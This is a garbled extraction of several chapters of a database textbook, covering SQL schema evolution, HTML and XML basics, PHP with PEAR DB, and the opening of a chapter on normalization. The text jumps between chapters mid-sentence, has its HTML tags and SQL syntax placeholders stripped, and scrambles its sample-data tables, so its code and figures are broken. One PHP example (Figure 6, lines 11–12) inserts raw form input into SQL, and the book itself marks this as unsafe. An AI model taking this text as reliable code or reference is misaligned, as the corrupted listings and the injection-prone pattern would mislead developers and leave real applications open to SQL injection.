A.4 from the EMPLOYEE relation, we write:

ALTER TABLE COMPANY.EMPLOYEE
DROP CONSTRAINT EMPSUPERFK CASCADE;

Once this is done, we can redefine a replacement constraint by adding a new con-
straint to the relation, if needed. This is specified by using the ADD keyword in the
ALTER TABLE statement followed by the new constraint, which can be named or
unnamed and can be of any of the table constraint types discussed.

The preceding subsections gave an overview of the schema evolution commands of
SQL. It is also possible to create new tables and views within a database schema
using the appropriate commands. There are many other details and options; we
refer the interested reader to the SQL documents listed in the Selected Bibliography
at the end of this chapter.

5 Summary
In this chapter we presented additional features of the SQL database language. We
started in Section 1 by presenting more complex features of SQL retrieval queries,
including nested queries, joined tables, outer joins, aggregate functions, and group-
ing. In Section 2, we described the CREATE ASSERTION statement, which allows the
specification of more general constraints on the database, and introduced the con-
cept of triggers and the CREATE TRIGGER statement. Then, in Section 3, we
described the SQL facility for defining views on the database. Views are also called

139

More SQL: Complex Queries, Triggers, Views, and Schema Modification

Table 2 Summary of SQL Syntax

CREATE TABLE

( [ ]
{ , [ ] }
[

{ ,

} ] )

DROP TABLE

ALTER TABLE

ADD

SELECT [ DISTINCT ]
FROM (

{ } | ) { , (

{ } | ) }
[ WHERE ]
[ GROUP BY [ HAVING ] ]
[ ORDER BY [ ] { , [ ] } ]

::= ( * | ( | ( ( [ DISTINCT ] | * ) ) )
{ , ( | ( ( [ DISTINCT] | * ) ) } ) )

::= { , }

::= ( ASC | DESC )

INSERT INTO

[ ( { , } ) ]
( VALUES ( , { } ) { , ( { , } ) }
|
[ WHERE ]

UPDATE

SET = { , = }
[ WHERE ]

CREATE [ UNIQUE] INDEX
ON

( [ ] { , [ ] } )
[ CLUSTER ]

DROP INDEX

CREATE VIEW [ ( { , } ) ]
AS






John Smith: 32.5 hours per week
Joyce English: 20.0 hours per week

The ProductY project:









John Smith: 7.5 hours per week
Joyce English: 20.0 hours per week
Franklin Wong: 10.0 hours per week


In addition to structured and semistructured data, a third category exists, known as
unstructured data because there is very limited indication of the type of data. A
typical example is a text document that contains information embedded within it.
Web pages in HTML that contain some data are considered to be unstructured data.
Consider part of an HTML file, shown in Figure 2. Text that appears between angled
brackets, <...>, is an HTML tag. A tag with a slash, , indicates an end tag,
which represents the ending of the effect of a matching start tag. The tags mark up

423

XML: Extensible Markup Language

the document1 in order to instruct an HTML processor how to display the text
between a start tag and a matching end tag. Hence, the tags specify document for-
matting rather than the meaning of the various data elements in the document.
HTML tags specify information, such as font size and style (boldface, italics, and so
on), color, heading levels in documents, and so on. Some tags provide text structur-
ing in documents, such as specifying a numbered or unnumbered list or a table.
Even these structuring tags specify that the embedded textual data is to be displayed
in a certain manner, rather than indicating the type of data represented in the table.

HTML uses a large number of predefined tags, which are used to specify a variety of
commands for formatting Web documents for display. The start and end tags spec-
ify the range of text to be formatted by each command. A few examples of the tags
shown in Figure 2 follow:

■ The … tags specify the boundaries of the document.
■ The document header information—within the …

tags—specifies various commands that will be used elsewhere in the docu-
ment. For example, it may specify various script functions in a language
such as JavaScript or PERL, or certain formatting styles (fonts, paragraph
styles, header styles, and so on) that can be used in the document. It can also
specify a title to indicate what the HTML file is for, and other similar infor-
mation that will not be displayed as part of the document.

■ The body of the document—specified within the …
tags—includes the document text and the markup tags that specify how the
text is to be formatted and displayed. It can also include references to other
objects, such as images, videos, voice messages, and other documents.

■ The

tags specify that the text is to be displayed as a level 1
heading. There are many heading levels (

,

, and so on), each dis-
playing text in a less prominent heading format.

■ The

tags specify that the following text is to be dis-
played as a table. Each table row in the table is enclosed within …
tags, and the individual table data elements in a row are displayed
within … tags.2

■ Some tags may have attributes, which appear within the start tag and
describe additional properties of the tag.3

In Figure 2, the

start tag has four attributes describing various character-
istics of the table. The following stands for table row and ‘;
9) print “\n”;

10) }

There are two main types of arrays: numeric and associative. We discuss each of
these in the context of single-dimensional arrays next.

A numeric array associates a numeric index (or position or sequence number) with
each element in the array. Indexes are integer numbers that start at zero and grow
incrementally. An element in the array is referenced through its index. An
associative array provides pairs of (key => value) elements. The value of an element
is referenced through its key, and all key values in a particular array must be unique.
The element values can be strings or integers, or they can be arrays themselves, thus
leading to higher dimensional arrays.

Figure 3 gives two examples of array variables: $teaching and $courses. The first
array $teaching is associative (see line 0 in Figure 3), and each element associates a
course name (as key) with the name of the course instructor (as value). There are
three elements in this array. Line 1 shows how the array may be updated. The first
command in line 1 assigns a new instructor to the course ‘Graphics’ by updating its
value. Since the key value ‘Graphics’ already exists in the array, no new element is
created but the existing value is updated. The second command creates a new ele-
ment since the key value ‘Data Mining’ did not exist in the array before. New ele-
ments are added at the end of the array.

If we only provide values (no keys) as array elements, the keys are automatically
numeric and numbered 0, 1, 2, …. This is illustrated in line 5 of Figure 3, by the
$courses array. Both associative and numeric arrays have no size limits. If some
value of another data type, say an integer, is assigned to a PHP variable that was
holding an array, the variable now holds the integer value and the array contents are
lost. Basically, most variables can be assigned to values of any data type at any time.

There are several different techniques for looping through arrays in PHP. We illus-
trate two of these techniques in Figure 3. Lines 3 and 4 show one method of looping
through all the elements in an array using the foreach construct, and printing the

496

Web Database Programming Using PHP

key and value of each element on a separate line. Lines 7 through 10 show how a tra-
ditional for-loop construct can be used. A built-in function count (line 7) returns
the current number of elements in the array, which is assigned to the variable $num
and used to control ending the loop.

The example in lines 7 through 10 also illustrates how an HTML table can be dis-
played with alternating row colors, by setting the two colors in an array
$alt_row_color (line 8). Each time through the loop, the remainder function $i
% 2 switches from one row (index 0) to the next (index 1) (see line 8). The color is
assigned to the HTML bgcolor attribute of the

(table row) tag.

The count function (line 7) returns the current number of elements in the array.
The sort function (line 2) sorts the array based on the element values in it (not the
keys). For associative arrays, each key remains associated with the same element
value after sorting. This does not occur when sorting numeric arrays. There are
many other functions that can be applied to PHP arrays, but a full discussion is out-
side the scope of our presentation.

2.3 PHP Functions
As with other programming languages, functions can be defined in PHP to better
structure a complex program and to share common sections of code that can be
reused by multiple applications. The newer version of PHP, PHP5, also has object-
oriented features, but we will not discuss these here as we are focusing on the basics
of PHP. Basic PHP functions can have arguments that are passed by value. Global
variables can be accessed within functions. Standard scope rules apply to variables
that appear within a function and within the code that calls the function.

We now give two simple examples to illustrate basic PHP functions. In Figure 4, we
show how we could rewrite the code segment P1 from Figure 1(a) using functions.
The code segment P1� in Figure 4 has two functions: display_welcome() (lines 0
to 3) and display_empty_form() (lines 5 to 13). Neither of these functions has
arguments nor do they have return values. Lines 14 through 19 show how we can
call these functions to produce the same effect as the segment of code P1 in Figure
1(a). As we can see in this example, functions can be used just to make the PHP code
better structured and easier to follow.

A second example is shown in Figure 5. Here we are using the $teaching array
introduced in Figure 3. The function course_instructor() in lines 0 to 8 in
Figure 5 has two arguments: $course (a string holding a course name) and
$teaching_assignments (an associative array holding course assignments, simi-
lar to the $teaching array shown in Figure 3). The function finds the name of the
instructor who teaches a particular course. Lines 9 to 14 in Figure 5 show how this
function may be used.

The function call in line 11 would return the string: Smith is teaching Database,
because the array entry with the key ‘Database’ has the value ‘Smith’ for instructor.
On the other hand, the function call on line 13 would return the string: there is no
Computer Architecture course because there is no entry in the array with the key

497

Web Database Programming Using PHP

Figure 4
Rewriting program segment P1 as P1� using functions.

//Program Segment P1′:
0) function display_welcome() {
1) print(“Welcome, “) ;
2) print($_POST[‘user_name’]);
3) }
4)
5) function display_empty_form(); {
6) print <<<_HTML_ 7)

8) Enter your name:
9)

10)
11)
12) _HTML_;
13) }
14) if ($_POST[‘user_name’]) {
15) display_welcome();
16) }
17) else {
18) display_empty_form();
19) }

Figure 5
Illustrating a function with arguments and return value.

0) function course_instructor ($course, $teaching_assignments) {
1) if (array_key_exists($course, $teaching_assignments)) {
2) $instructor = $teaching_assignments[$course];
3) RETURN “$instructor is teaching $course”;
4) }
5) else {
6) RETURN “there is no $course course”;
7) }
8) }
9) $teaching = array(‘Database’ => ‘Smith’, ‘OS’ => ‘Carrick’,

‘Graphics’ => ‘Kam’);
10) $teaching[‘Graphics’] = ‘Benson’; $teaching[‘Data Mining’] = ‘Kam’;
11) $x = course_instructor(‘Database’, $teaching);
12) print($x);
13) $x = course_instructor(‘Computer Architecture’, $teaching);
14) print($x);

498

Web Database Programming Using PHP

‘Computer Architecture’. A few comments about this example and about PHP func-
tions in general:

■ The built-in PHP array function array_key_exists($k, $a) returns true
if the value in variable $k exists as a key in the associative array in the variable
$a. In our example, it checks whether the $course value provided exists as a
key in the array $teaching_assignments (line 1 in Figure 5).

■ Function arguments are passed by value. Hence, in this example, the calls in
lines 11 and 13 could not change the array $teaching provided as argument
for the call. The values provided in the arguments are passed (copied) to the
function arguments when the function is called.

■ Return values of a function are placed after the RETURN keyword. A function
can return any type. In this example, it returns a string type. Two different
strings can be returned in our example, depending on whether the $course
key value provided exists in the array or not.

■ Scope rules for variable names apply as in other programming languages.
Global variables outside of the function cannot be used unless they are
referred to using the built-in PHP array $GLOBALS. Basically,
$GLOBALS[‘abc’] will access the value in a global variable $abc defined
outside the function. Otherwise, variables appearing inside a function are
local even if there is a global variable with the same name.

The previous discussion gives a brief overview of PHP functions. Many details are
not discussed since it is not our goal to present PHP in detail.

2.4 PHP Server Variables and Forms
There are a number of built-in entries in a PHP auto-global built-in array variable
called $_SERVER that can provide the programmer with useful information about
the server where the PHP interpreter is running, as well as other information. These
may be needed when constructing the text in an HTML document (for example, see
line 7 in Figure 4). Here are some of these entries:

1. $_SERVER[‘SERVER_NAME’]. This provides the Web site name of the server
computer where the PHP interpreter is running. For example, if the PHP
interpreter is running on the Web site http://www.uta.edu, then this string
would be the value in $_SERVER[‘SERVER_NAME’].

2. $_SERVER[‘REMOTE_ADDRESS’]. This is the IP (Internet Protocol) address
of the client user computer that is accessing the server, for example
129.107.61.8.

3. $_SERVER[‘REMOTE_HOST’]. This is the Web site name of the client user
computer, for example abc.uta.edu. In this case, the server will need to trans-
late the name into an IP address to access the client.

4. $_SERVER[‘PATH_INFO’]. This is the part of the URL address that comes
after a backslash (/) at the end of the URL.

499

Web Database Programming Using PHP

5. $_SERVER[‘QUERY_STRING’]. This provides the string that holds parame-
ters in a URL after a question mark (?) at the end of the URL. This can hold
search parameters, for example.

6. $_SERVER[‘DOCUMENT_ROOT’]. This is the root directory that holds the
files on the Web server that are accessible to client users.

These and other entries in the $_SERVER array are usually needed when creating the
HTML file to be sent for display.

Another important PHP auto-global built-in array variable is called $_POST. This
provides the programmer with input values submitted by the user through HTML
forms specified in the HTML tag and other similar tags. For example, in
Figure 4 line 14, the variable $_POST[‘user_name’] provides the programmer
with the value typed in by the user in the HTML form specified via the tag
on line 8. The keys to this array are the names of the various input parameters pro-
vided via the form, for example by using the name attribute of the HTML
tag as on line 8. When users enter data through forms, the data values can be stored
in this array.

3 Overview of PHP Database Programming
There are various techniques for accessing a database through a programming lan-
guage, such as accessing a SQL database using the C and Java programming lan-
guages, particulary, embedded SQL, JDBC, SQL/CLI (similar to ODBC), and SQLJ.
In this section we give an overview of how to access the database using the script
language PHP, which is quite suitable for creating Web interfaces for searching and
updating databases, as well as dynamic Web pages.

There is a PHP database access function library that is part of PHP Extension and
Application Repository (PEAR), which is a collection of several libraries of func-
tions for enhancing PHP. The PEAR DB library provides functions for database
access. Many database systems can be accessed from this library, including Oracle,
MySQL, SQLite, and Microsoft SQLServer, among others.

We will discuss several functions that are part of PEAR DB in the context of some
examples. Section 3.1 shows how to connect to a database using PHP. Section 3.2
discusses how data collected from HTML forms can be used to insert a new record
in a database table (relation). Section 3.3 shows how retrieval queries can be exe-
cuted and have their results displayed within a dynamic Web page.

3.1 Connecting to a Database
To use the database functions in a PHP program, the PEAR DB library module
called DB.php must be loaded. In Figure 6, this is done in line 0 of the example. The
DB library functions can now be accessed using DB::. The func-
tion for connecting to a database is called DB::connect(‘string’) where the

500

Web Database Programming Using PHP

Figure 6
Connecting to a database, creating a table, and inserting a record.

0) require ‘DB.php’;
1) $d = DB::connect(‘oci8://acct1: .com/db1’);
2) if (DB::isError($d)) { die(“cannot connect – ” . $d->getMessage());}


3) $q = $d->query(“CREATE TABLE EMPLOYEE
4) (Emp_id INT,
5) Name VARCHAR(15),
6) Job VARCHAR(10),
7) Dno INT)” );
8) if (DB::isError($q)) { die(“table creation not successful – ” .

$q->getMessage()); }

9) $d->setErrorHandling(PEAR_ERROR_DIE);

10) $eid = $d->nextID(‘EMPLOYEE’);
11) $q = $d->query(“INSERT INTO EMPLOYEE VALUES
12) ($eid, $_POST[’emp_name’], $_POST[’emp_job’], $_POST[’emp_dno’])” );


13) $eid = $d->nextID(‘EMPLOYEE’);
14) $q = $d->query(‘INSERT INTO EMPLOYEE VALUES (?, ?, ?, ?)’,
15) array($eid, $_POST[’emp_name’], $_POST[’emp_job’], $_POST[’emp_dno’]) );

string argument specifies the database information. The format for ‘string’ is:

://:@

In Figure 6, line 1 connects to the database that is stored using Oracle (specified via
the string oci8). The portion of the ‘string’ specifies the par-
ticular DBMS software package being connected to. Some of the DBMS software
packages that are accessible through PEAR DB are:

■ MySQL. Specified as mysql for earlier versions and mysqli for later versions
starting with version 4.1.2.

■ Oracle. Specified as oc8i for versions 7, 8, and 9. This is used in line 1 of
Figure 6.

■ SQLite. Specified as sqlite.
■ Microsoft SQL Server. Specified as mssql.
■ Mini SQL. Specified as msql.
■ Informix. Specified as ifx.
■ Sybase. Specified as sybase.
■ Any ODBC-compliant system. Specified as odbc.

The above is not a comprehensive list.

501

Web Database Programming Using PHP

Following the in the string argument passed to DB::connect is
the separator :// followed by the user account name followed by
the separator : and the account password . These are followed by the
separator @ and the server name and directory where the
database is stored.

In line 1 of Figure 6, the user is connecting to the server at www.host.com/db1 using
the account name acct1 and password pass12 stored under the Oracle DBMS
oci8. The whole string is passed using DB::connect. The connection information
is kept in the database connection variable $d, which is used whenever an operation
to this particular database is applied.

Line 2 in Figure 6 shows how to check whether the connection to the database was
established successfully or not. PEAR DB has a function DB::isError, which can
determine whether any database access operation was successful or not. The argu-
ment to this function is the database connection variable ($d in this example). In
general, the PHP programmer can check after every database call to determine
whether the last database operation was successful or not, and terminate the pro-
gram (using the die function) if it was not successful. An error message is also
returned from the database via the operation $d->get_message(). This can also
be displayed as shown in line 2 of Figure 6.

In general, most SQL commands can be sent to the database once a connection is
established via the query function. The function $d->query takes an SQL com-
mand as its string argument and sends it to the database server for execution. In
Figure 6, lines 3 to 7 send a CREATE TABLE command to create a table called
EMPLOYEE with four attributes. Whenever a query is executed, the result of the
query is assigned to a query variable, which is called $q in our example. Line 8
checks whether the query was executed successfully or not.

The PHP PEAR DB library offers an alternative to having to check for errors after
every database command. The function

$d–>setErrorHandling(PEAR_ERROR_DIE)

will terminate the program and print the default error messages if any subsequent
errors occur when accessing the database through connection $d (see line 9 in
Figure 6).

3.2 Collecting Data from Forms and Inserting Records
It is common in database applications to collect information through HTML or
other types of Web forms. For example, when purchasing an airline ticket or apply-
ing for a credit card, the user has to enter personal information such as name,
address, and phone number. This information is typically collected and stored in a
database record on a database server.

Lines 10 through 12 in Figure 6 illustrate how this may be done. In this example, we
omitted the code for creating the form and collecting the data, which can be a vari-
ation of the example in Figure 1. We assume that the user entered valid values in the

502

Web Database Programming Using PHP

input parameters called emp_name, emp_job, and emp_dno. These would be acces-
sible via the PHP auto-global array $_POST as discussed at the end of Section 2.4.

In the SQL INSERT command shown on lines 11 and 12 in Figure 6, the array
entries $POST[’emp_name’], $POST[’emp_job’], and $POST[’emp_dno’] will
hold the values collected from the user through the input form of HTML. These are
then inserted as a new employee record in the EMPLOYEE table.

This example also illustrates another feature of PEAR DB. It is common in some
applications to create a unique record identifier for each new record inserted into
the database.1

PHP has a function $d–>nextID to create a sequence of unique values for a partic-
ular table. In our example, the field Emp_id of the EMPLOYEE table (see Figure 6, line
4) is created for this purpose. Line 10 shows how to retrieve the next unique value in
the sequence for the EMPLOYEE table and insert it as part of the new record in lines
11 and 12.

The code for insert in lines 10 to 12 in Figure 6 may allow malicious strings to be
entered that can alter the INSERT command. A safer way to do inserts and other
queries is through the use of placeholders (specified by the ? symbol). An example
is illustrated in lines 13 to 15, where another record is to be inserted. In this form of
the $d->query() function, there are two arguments. The first argument is the SQL
statement, with one or more ? symbols (placeholders). The second argument is an
array, whose element values will be used to replace the placeholders in the order
they are specified.

3.3 Retrieval Queries from Database Tables
We now give three examples of retrieval queries through PHP, shown in Figure 7.
The first few lines 0 to 3 establish a database connection $d and set the error han-
dling to the default, as we discussed in the previous section. The first query (lines 4
to 7) retrieves the name and department number of all employee records. The query
variable $q is used to refer to the query result. A while-loop to go over each row in
the result is shown in lines 5 to 7. The function $q->fetchRow() in line 5 serves to
retrieve the next record in the query result and to control the loop. The looping
starts at the first record.

The second query example is shown in lines 8 to 13 and illustrates a dynamic query.
In this query, the conditions for selection of rows are based on values input by the
user. Here we want to retrieve the names of employees who have a specific job and
work for a particular department. The particular job and department number are
entered through a form in the array variables $POST[’emp_job’] and

1This would be similar to system-generated OID for object and object-relational database systems.

503

Web Database Programming Using PHP

Figure 7
Illustrating database retrieval queries.

0) require ‘DB.php’;
1) $d = DB::connect(‘oci8://acct1: .com/dbname’);
2) if (DB::isError($d)) { die(“cannot connect – ” . $d->getMessage()); }
3) $d->setErrorHandling(PEAR_ERROR_DIE);


4) $q = $d->query(‘SELECT Name, Dno FROM EMPLOYEE’);
5) while ($r = $q->fetchRow()) {
6) print “employee $r[0] works for department $r[1] \n” ;
7) }


8) $q = $d->query(‘SELECT Name FROM EMPLOYEE WHERE Job = ? AND Dno = ?’,
9) array($_POST[’emp_job’], $_POST[’emp_dno’]) );

10) print “employees in dept $_POST[’emp_dno’] whose job is
$_POST[’emp_job’]: \n”

11) while ($r = $q->fetchRow()) {
12) print “employee $r[0] \n” ;
13) }


14) $allresult = $d->getAll(‘SELECT Name, Job, Dno FROM EMPLOYEE’);
15) foreach ($allresult as $r) {
16) print “employee $r[0] has job $r[1] and works for department $r[2] \n” ;
17) }

$POST[’emp_dno’]. If the user had entered ‘Engineer’ for the job and 5 for the
department number, the query would select the names of all engineers who worked
in department 5. As we can see, this is a dynamic query whose results differ depend-
ing on the choices that the user enters as input. We used two ? placeholders in this
example, as discussed at the end of Section 3.2.

The last query (lines 14 to 17) shows an alternative way of specifying a query and
looping over its rows. In this example, the function $d=>getAll holds all the
records in a query result in a single variable, called $allresult. To loop over the
individual records, a foreach loop can be used, with the row variable $r iterating
over each row in $allresult.2

As we can see, PHP is suited for both database access and creating dynamic Web
pages.

2The $r variable is similar to the cursors and iterator variables.

504

Web Database Programming Using PHP

4 Summary
In this chapter, we gave an overview of how to convert some structured data from
databases into elements to be entered or displayed on a Web page. We focused on
the PHP scripting language, which is becoming very popular for Web database pro-
gramming. Section 1 presented some PHP basics for Web programming through a
simple example. Section 2 gave some of the basics of the PHP language, including its
array and string data types that are used extensively. Section 3 presented an
overview of how PHP can be used to specify various types of database commands,
including creating tables, inserting new records, and retrieving database records.
PHP runs at the server computer in comparison to some other scripting languages
that run on the client computer.

We gave only a very basic introduction to PHP. There are many books as well as
many Web sites devoted to introductory and advanced PHP programming. Many
libraries of functions also exist for PHP, as it is an open source product.

Review Questions
1. Why are scripting languages popular for programming Web applications?

Where in the three-tier architecture does a PHP program execute? Where
does a JavaScript program execute?

2. What type of programming language is PHP?

3. Discuss the different ways of specifying strings in PHP.

4. Discuss the different types of arrays in PHP.

5. What are PHP auto-global variables? Give some examples of PHP auto-
global arrays, and discuss how each is typically used.

6. What is PEAR? What is PEAR DB?

7. Discuss the main functions for accessing a database in PEAR DB, and how
each is used.

8. Discuss the different ways for looping over a query result in PHP.

9. What are placeholders? How are they used in PHP database programming?

505

Web Database Programming Using PHP

Exercises
10. Consider the LIBRARY database schema shown in Figure A.1. Write PHP

code to create the tables of this schema.

11. Write a PHP program that creates Web forms for entering the information
about a new BORROWER entity. Repeat for a new BOOK entity.

12. Write PHP Web interfaces for the queries specified in Exercise 18 from the
chapter “The Relational Algebra and Relational Calculus.”

Selected Bibliography
There are many sources for PHP programming, both in print and on the Web. We
give two books as examples. A very good introduction to PHP is given in Sklar
(2005). For advanced Web site development, the book by Schlossnagle (2005) pro-
vides many detailed examples.

506

Publisher_nameBook_id Title

BOOK

BOOK_COPIES
Book_id Branch_id No_of_copies

BOOK_AUTHORS

Book_id Author_name

LIBRARY_BRANCH
Branch_id Branch_name Address

PUBLISHER

Name Address Phone

BOOK_LOANS

Book_id Branch_id Card_no Date_out Due_date

BORROWER
Card_no Name Address Phone

Figure A.1
A relational database
schema for a
LIBRARY database.

507

Basics of Functional
Dependencies and Normalization

for Relational Databases

Each relation schema consists of a number of attrib-utes, and the relational database schema consists of
a number of relation schemas. You may have assumed that attributes are grouped to
form a relation schema by using the common sense of the database designer or by
mapping a database schema design from a conceptual data model such as the
Entity-Relationship (ER) or Enhanced-ER (EER) data model. These models make
the designer identify entity types and relationship types and their respective attrib-
utes, which leads to a natural and logical grouping of the attributes into relations
when mapping procedures are followed. However, we need some formal way of ana-
lyzing why one grouping of attributes into a relation schema may be better than
another. While discussing database design, you may not have developed any meas-
ure of appropriateness or goodness to measure the quality of the design, other than
the intuition of the designer. In this chapter we discuss some of the theory that has
been developed with the goal of evaluating relational schemas for design quality—
that is, to measure formally why one set of groupings of attributes into relation
schemas is better than another.

There are two levels at which we can discuss the goodness of relation schemas. The
first is the logical (or conceptual) level—how users interpret the relation schemas
and the meaning of their attributes. Having good relation schemas at this level
enables users to understand clearly the meaning of the data in the relations, and
hence to formulate their queries correctly. The second is the implementation (or

From Chapter 15 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

508

Basics of Functional Dependencies and Normalization for Relational Databases

physical storage) level—how the tuples in a base relation are stored and updated.
This level applies only to schemas of base relations—which will be physically stored
as files—whereas at the logical level we are interested in schemas of both base rela-
tions and views (virtual relations). The relational database design theory developed
in this chapter applies mainly to base relations, although some criteria of appropri-
ateness also apply to views, as shown in Section 1.

As with many design problems, database design may be performed using two
approaches: bottom-up or top-down. A bottom-up design methodology (also
called design by synthesis) considers the basic relationships among individual attrib-
utes as the starting point and uses those to construct relation schemas. This
approach is not very popular in practice1 because it suffers from the problem of
having to collect a large number of binary relationships among attributes as the
starting point. For practical situations, it is next to impossible to capture binary
relationships among all such pairs of attributes. In contrast, a top-down design
methodology (also called design by analysis) starts with a number of groupings of
attributes into relations that exist together naturally, for example, on an invoice, a
form, or a report. The relations are then analyzed individually and collectively, lead-
ing to further decomposition until all desirable properties are met. The theory
described in this chapter is applicable to both the top-down and bottom-up design
approaches, but is more appropriate when used with the top-down approach.

Relational database design ultimately produces a set of relations. The implicit goals
of the design activity are information preservation and minimum redundancy.
Information is very hard to quantify—hence we consider information preservation
in terms of maintaining all concepts, including attribute types, entity types, and
relationship types as well as generalization/specialization relationships, which are
described using a model such as the EER model. Thus, the relational design must
preserve all of these concepts, which are originally captured in the conceptual
design after the conceptual to logical design mapping. Minimizing redundancy
implies minimizing redundant storage of the same information and reducing the
need for multiple updates to maintain consistency across multiple copies of the
same information in response to real-world events that require making an update.

We start this chapter by informally discussing some criteria for good and bad rela-
tion schemas in Section 1. In Section 2, we define the concept of functional depend-
ency, a formal constraint among attributes that is the main tool for formally
measuring the appropriateness of attribute groupings into relation schemas. In
Section 3, we discuss normal forms and the process of normalization using func-
tional dependencies. Successive normal forms are defined to meet a set of desirable
constraints expressed using functional dependencies. The normalization procedure
consists of applying a series of tests to relations to meet these increasingly stringent
requirements and decompose the relations when necessary. In Section 4, we discuss

1An exception in which this approach is used in practice is based on a model called the binary relational
model. An example is the NIAM methodology (Verheijen and VanBekkum, 1982).

509

Basics of Functional Dependencies and Normalization for Relational Databases

more general definitions of normal forms that can be directly applied to any given
design and do not require step-by-step analysis and normalization. Sections 5 to 7
discuss further normal forms up to the fifth normal form. In Section 6 we introduce
the multivalued dependency (MVD), followed by the join dependency (JD) in
Section 7. Section 8 summarizes the chapter.

Further study should continue the development of the theory related to the design
of good relational schemas. This includes: desirable properties of relational decom-
position—nonadditive join property and functional dependency preservation
property; a general algorithm that tests whether or not a decomposition has the
nonadditive (or lossless) join property; properties of functional dependencies and
the concept of a minimal cover of dependencies; the bottom-up approach to data-
base design consisting of a set of algorithms to design relations in a desired normal
form; and define additional types of dependencies that further enhance the evalua-
tion of the goodness of relation schemas.

1 Informal Design Guidelines
for Relation Schemas

Before discussing the formal theory of relational database design, we discuss four
informal guidelines that may be used as measures to determine the quality of relation
schema design:

■ Making sure that the semantics of the attributes is clear in the schema

■ Reducing the redundant information in tuples

■ Reducing the NULL values in tuples

■ Disallowing the possibility of generating spurious tuples

These measures are not always independent of one another, as we will see.

1.1 Imparting Clear Semantics to Attributes in Relations
Whenever we group attributes to form a relation schema, we assume that attributes
belonging to one relation have certain real-world meaning and a proper interpreta-
tion associated with them. The semantics of a relation refers to its meaning result-
ing from the interpretation of attribute values in a tuple. If the conceptual design is
done carefully and the mapping procedure is followed systematically, the relational
schema design should have a clear meaning.

510

Basics of Functional Dependencies and Normalization for Relational Databases

DEPARTMENT

DnumberDname

Ename Bdate Address Dnumber

EMPLOYEE

P.K.

P.K.

F.K.

Pname Pnumber Plocation Dnum

PROJECT F.K.

F.K.

DEPT_LOCATIONS

Dnumber Dlocation

P.K.

P.K.

Pnumber Hours

WORKS_ON
F.K. F.K.

P.K.

F.K.

Ssn

Dmgr_ssn

Ssn

Figure 1
A simplified COMPANY relational
database schema.

In general, the easier it is to explain the semantics of the relation, the better the rela-
tion schema design will be. To illustrate this, consider Figure 1, a simplified version
of the COMPANY relational database schema in Figure 2, which presents an example
of populated relation states of this schema. The meaning of the EMPLOYEE relation
schema is quite simple: Each tuple represents an employee, with values for the
employee’s name (Ename), Social Security number (Ssn), birth date (Bdate), and
address (Address), and the number of the department that the employee works for
(Dnumber). The Dnumber attribute is a foreign key that represents an implicit rela-
tionship between EMPLOYEE and DEPARTMENT. The semantics of the
DEPARTMENT and PROJECT schemas are also straightforward: Each DEPARTMENT
tuple represents a department entity, and each PROJECT tuple represents a project
entity. The attribute Dmgr_ssn of DEPARTMENT relates a department to the
employee who is its manager, while Dnum of PROJECT relates a project to its con-
trolling department; both are foreign key attributes. The ease with which the mean-
ing of a relation’s attributes can be explained is an informal measure of how well the
relation is designed.

511

Basics of Functional Dependencies and Normalization for Relational Databases

Ename

EMPLOYEE

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.
Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

999887777

123456789

333445555

453453453

987654321
666884444

987987987

888665555

666884444

123456789

123456789

333445555

453453453
453453453

333445555

333445555
333445555

999887777

987987987

999887777
987987987

987654321

987654321
888665555

3

1

2

2

1
2

3

10

20

10

30
10

30

30

20

20

40.0

32.5

7.5

10.0

20.0
20.0

10.0

10.0

10.0

35.0

30.0
10.0

5.0

20.0

15.0

Null

1937-11-10

1968-07-19

1965-01-09

1955-12-08

1972-07-31

1969-03-29

1941-06-20
1962-09-15

Bdate

3321 Castle, Spring, TX

731 Fondren, Houston, TX 5

638 Voss, Houston, TX

5631 Rice, Houston, TX

980 Dallas, Houston, TX

450 Stone, Houston, TX

291Berry, Bellaire, TX

975 Fire Oak, Humble, TX

Address

4

5

5

4

1

4

5

Dnumber

Dname

DEPARTMENT

Research

Administration

Headquarters 888665555

333445555

987654321

Dnumber

5

1

4

DEPT_LOCATIONS

1

4

5

Dnumber

Houston

Dlocation

Bellaire

Stafford

Houston

Sugarland

5

5

PROJECT

ProductX

ProductY

ProductZ

Pname

1

Pnumber Plocation Dnum

3

2

20

10

Reorganization

30

5

5

5

1

4

4

Bellaire

Houston

Sugarland

Houston

Stafford

StaffordNewbenefits

Computerization

WORKS_ON

Pnumber Hours

Ssn

Dmgr_ssn

Ssn

Figure 2
Sample database state for the relational database schema in Figure 1.

512

Basics of Functional Dependencies and Normalization for Relational Databases

Ssn

EMP_PROJ

(b)

(a)

FD1

FD2

FD3

Pnumber Hours Ename Pname Plocation

Ename Ssn

EMP_DEPT
Bdate Address Dnumber Dname Dmgr_ssn

Figure 3
Two relation schemas
suffering from update
anomalies. (a)
EMP_DEPT and (b)
EMP_PROJ.

The semantics of the other two relation schemas in Figure 1 are slightly more com-
plex. Each tuple in DEPT_LOCATIONS gives a department number (Dnumber) and
one of the locations of the department (Dlocation). Each tuple in WORKS_ON gives
an employee Social Security number (Ssn), the project number of one of the proj-
ects that the employee works on (Pnumber), and the number of hours per week that
the employee works on that project (Hours). However, both schemas have a well-
defined and unambiguous interpretation. The schema DEPT_LOCATIONS repre-
sents a multivalued attribute of DEPARTMENT, whereas WORKS_ON represents an
M:N relationship between EMPLOYEE and PROJECT. Hence, all the relation
schemas in Figure 1 may be considered as easy to explain and therefore good from
the standpoint of having clear semantics. We can thus formulate the following
informal design guideline.

Guideline 1
Design a relation schema so that it is easy to explain its meaning. Do not combine
attributes from multiple entity types and relationship types into a single relation.
Intuitively, if a relation schema corresponds to one entity type or one relationship
type, it is straightforward to interpret and to explain its meaning. Otherwise, if the
relation corresponds to a mixture of multiple entities and relationships, semantic
ambiguities will result and the relation cannot be easily explained.

Examples of Violating Guideline 1. The relation schemas in Figures 3(a) and
3(b) also have clear semantics. (The reader should ignore the lines under the rela-
tions for now; they are used to illustrate functional dependency notation, discussed
in Section 2.) A tuple in the EMP_DEPT relation schema in Figure 3(a) represents a
single employee but includes additional information—namely, the name (Dname)
of the department for which the employee works and the Social Security number
(Dmgr_ssn) of the department manager. For the EMP_PROJ relation in Figure 3(b),
each tuple relates an employee to a project but also includes the employee name

513

Basics of Functional Dependencies and Normalization for Relational Databases

(Ename), project name (Pname), and project location (Plocation). Although there is
